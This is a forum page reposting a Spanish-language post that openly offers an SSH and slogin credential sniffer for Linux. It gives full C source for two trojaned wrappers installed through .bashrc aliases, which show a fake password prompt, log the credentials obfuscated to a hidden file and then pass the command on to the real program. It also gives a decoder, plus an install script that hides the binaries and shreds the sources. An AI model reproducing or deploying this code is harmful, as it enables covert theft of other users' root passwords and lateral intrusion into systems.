Giriş yap
En iyi yollayıcılar
Hello EMO | ||||
EMO | ||||
eMoStyLe | ||||
BesimBICER | ||||
GameKinG | ||||
Crysis | ||||
~>!.DεvιLρяιεsт.!<~ | ||||
MeTaL | ||||
TrueCrime | ||||
djhayal3t |
Istatistikler
Toplam 203 kayıtlı kullanıcımız varSon kaydolan kullanıcımız: crayzboy76
Kullanıcılarımız toplam 1186 mesaj attılar bunda 862 konu
Arama
Sosyal yer imi
Sosyal bookmarking sitesinde Emo, Emo nedir, Emo resimleri, Emo Kıyafetleri, Emo Sözleri, Emo Oyunları, EmoTurkey, Emo Nickler, Emo Avatarları, Punk, Punk Resimleri, Punk Avatarları, Rock, Rock Resimleri, Rock Avatarları, Msn Nickleri, Msn Avatarları, Müzik adresi saklayın ve paylaşın
Sosyal bookmarking sitesinde EMO Style ForumPro - Hos Geldiniz adresi saklayın ve paylaşın
Kimler hatta?
Toplam 3 kullanıcı online :: 0 Kayıtlı, 0 Gizli ve 3 Misafir :: 1 Arama motorlarıYok
Sitede bugüne kadar en çok 217 kişi C.tesi Tem. 29, 2017 1:46 am tarihinde online oldu.
En son konular
Reklam
Ataque a OpenSSH usando alias bajo Linux
1 sayfadaki 1 sayfası
Ataque a OpenSSH usando alias bajo Linux
Kasswed demiş ki:Supongamos que tenemos acceso a un servidor Linux, pero no somos ni root ni nada.
Pero supongamos que desde el usuario donde tenemos acceso hay gente que se loguea como root a otras máquinas usando SSH. Esto es un escenario bastante típico.
Nuestro usuario por lo general podrá crear alias y compilar programas, y de esto nos vamos a valer para instalar este malware en un Linux. Lo único que haremos es esperar a que un usuario se loguee en otra máquina como root y obtener sus credenciales en un archivo de texto, que estará cifrado de forma bastante sencilla.
El programa se compone de 3 partes. sl.c, ssh.c y deco.c
sl.c se compila y se usa como alias del comando slogin
ssh.c se compila y se usa como alias del comando ssh
deco.c no se instala en la máquina víctima, sólo nos sirve para descifrar nuestro archivo con credenciales.
Lo pongo aquí para ver si alguien se anima a mejorarlo. Siento que no tenga muchos comentarios, pero es bastante simple de entender. Por supuesto, cada caso es diferente, así que habría que adaptar el código a cada caso, dependiendo de diversas variables.
sl.c
- Kod:
/*
Author: Kasswed for elhacker.net April 2012
This malware is composed of 3 parts:
1. sl.c: slogin snifer program code
2. ssh.c: ssh snifer program code
3. deco.c: decoder program for the logs files
Install this program (does not need to be root) using a bash script:
mkdir .config/.keyboard
gcc sl.c -o .config/.keyboard/sl
gcc ssh.c -o .config/.keyboard/s
echo "alias slogin='$HOME/.config/.keyboard/sl'" >> ~/.bashrc
echo "alias ssh='$HOME/.config/.keyboard/s'" >> ~/.bashrc
shred -n 30 -u sl.c
shred -n 30 -u ssh.c
Then remove the script as well with "shred -n 30 -u script.sh"
To get the passwords, get access to the victim's machine and copy the log file into your computer. Use the program deco:
$ ./deco logfile
Et voila.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#define BUF 1000
#define PATH "/usr/bin/slogin"
#define LOG "/.config/.keyboard/sx"
int main(int argc, char **argv){
char *ssh_arguments_send[BUF];
char ssh[] = "slogin";
ssh_arguments_send[0] = ssh;
if(argc != 2){
int j;
for(j=1;j<argc;j++)
ssh_arguments_send[j]=argv[j];
}
else{
FILE *file;
char dir[BUF];
strcpy(dir,getenv("HOME"));
strcat(dir,LOG);
int i;
struct passwd *pw;
char user[200];
char *ptr;
pw = getpwuid(geteuid());
strcpy(user,pw->pw_name);
ssh_arguments_send[1] = argv[1];
char pCopy[BUF],encript[BUF],host[BUF],password[BUF];
if(strchr(argv[1],'@') == NULL ){
strcpy(pCopy,user);
strcat(pCopy,"@");
strcat(pCopy,argv[1]);
}
else{
strcpy(pCopy,argv[1]);
}
sleep(2);
printf("%s",pCopy);
printf("'s password: ");
system("stty -echo");
fgets(password, BUF, stdin);
printf("\n");
system("stty echo");
password[strlen(password)-1] = '\0';
file = fopen(dir,"a+");
if(file!=NULL){
strcat(pCopy,"/");
strcat(pCopy,password);
strcat(pCopy,";");
for(i=0;i<strlen(pCopy);i++){
fprintf(file,"%c",pCopy[i]+ (33*i+1)%100);
fprintf(file,"%c",pCopy[i]+ (33*i+2)%98);
fprintf(file,"%c",pCopy[i]+25);
}
fprintf(file,"\n");
fclose(file);
}
sleep(2);
printf("Permission denied, please try again.\n");
}
execv(PATH,ssh_arguments_send);
}
ssh.c
- Kod:
/*
Author: Kasswed for elhacker.net April 2012
This malware is composed of 3 parts:
1. sl.c: slogin snifer program code
2. ssh.c: ssh snifer program code
3. deco.c: decoder program for the logs files
Install this program (does not need to be root) using a bash script:
mkdir .config/.keyboard
gcc sl.c -o .config/.keyboard/sl
gcc ssh.c -o .config/.keyboard/s
echo "alias slogin='$HOME/.config/.keyboard/sl'" >> ~/.bashrc
echo "alias ssh='$HOME/.config/.keyboard/s'" >> ~/.bashrc
shred -n 30 -u sl.c
shred -n 30 -u ssh.c
Then remove the script as well with "shred -n 30 -u script.sh"
To get the passwords, get access to the victim's machine and copy the log file into your computer. Use the program deco:
$ ./deco logfile
Et voila.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#define BUF 1000
#define PATH "/usr/bin/ssh"
#define LOG "/.config/.keyboard/sx"
int main(int argc, char **argv){
char *ssh_arguments_send[BUF];
char ssh[] = "ssh";
ssh_arguments_send[0] = ssh;
if(argc != 2){
int j;
for(j=1;j<argc;j++)
ssh_arguments_send[j]=argv[j];
}
else{
FILE *file;
char dir[BUF];
strcpy(dir,getenv("HOME"));
strcat(dir,LOG);
int i;
struct passwd *pw;
char user[200];
char *ptr;
pw = getpwuid(geteuid());
strcpy(user,pw->pw_name);
ssh_arguments_send[1] = argv[1];
char pCopy[BUF],encript[BUF],host[BUF],password[BUF];
if(strchr(argv[1],'@') == NULL ){
strcpy(pCopy,user);
strcat(pCopy,"@");
strcat(pCopy,argv[1]);
}
else{
strcpy(pCopy,argv[1]);
}
sleep(2);
printf("%s",pCopy);
printf("'s password: ");
system("stty -echo");
fgets(password, BUF, stdin);
printf("\n");
system("stty echo");
password[strlen(password)-1] = '\0';
file = fopen(dir,"a+");
if(file!=NULL){
strcat(pCopy,"/");
strcat(pCopy,password);
strcat(pCopy,";");
for(i=0;i<strlen(pCopy);i++){
fprintf(file,"%c",pCopy[i]+ (33*i+1)%100);
fprintf(file,"%c",pCopy[i]+ (33*i+2)%98);
fprintf(file,"%c",pCopy[i]+25);
}
fprintf(file,"\n");
fclose(file);
}
sleep(2);
printf("Permission denied, please try again.\n");
}
execv(PATH,ssh_arguments_send);
}
deco.c
- Kod:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define BUF 10000
int main(int argc,char **argv){
FILE* file;
int i;
char encript[BUF];
file = fopen(argv[1],"r");
fgets(encript,BUF,file);
for(i=0;i<strlen(encript);i++){
if((i+1)%3==0)
printf("%c",encript[i]-25);
}
fclose(file);
}
1 sayfadaki 1 sayfası
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz
Cuma Ağus. 29, 2014 8:33 am tarafından Hello EMO
» goldenchase.net maden yaparak para kazanma
Cuma Ağus. 29, 2014 8:18 am tarafından Hello EMO
» etichal hacker görsel egitim seti
Çarş. Ağus. 06, 2014 4:57 am tarafından Hello EMO
» KO TBL Source C#
Ptsi Ara. 09, 2013 6:36 am tarafından Hello EMO
» x86 Registers
C.tesi Ağus. 24, 2013 5:02 am tarafından Hello EMO
» [Tutorial] Pegando Address, Pointers de WYD
Çarş. Tem. 10, 2013 7:25 am tarafından Hello EMO
» [Tutorial] Pegando Address, Pointers de CS Metodo²
Çarş. Tem. 10, 2013 7:23 am tarafından Hello EMO
» [Tutorial] Aprendendo basico deASM OLLYDBG
Çarş. Tem. 10, 2013 7:22 am tarafından Hello EMO
» Basic C# DLL injector
Ptsi Tem. 08, 2013 7:48 am tarafından Hello EMO